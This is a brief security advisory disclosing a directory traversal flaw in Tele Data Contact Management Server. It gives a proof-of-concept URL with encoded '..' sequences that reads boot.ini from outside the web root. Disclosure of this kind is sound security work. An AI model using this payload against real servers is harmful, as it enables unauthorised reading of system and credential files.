------------------------------------------------------------------------ Software................Tele Data Contact Management Server Vulnerability...........Directory Traversal Threat Level............Serious (3/5) Download................http://teledata.qc.ca/td_cms/ Discovery Date..........6/1/2011 Tested On...............Windows XP SP3 EN ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------ --Description-- A directory traversal vulnerability in Tele Data Contact Management Server can be exploited to read files outside of the web root. --PoC-- http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini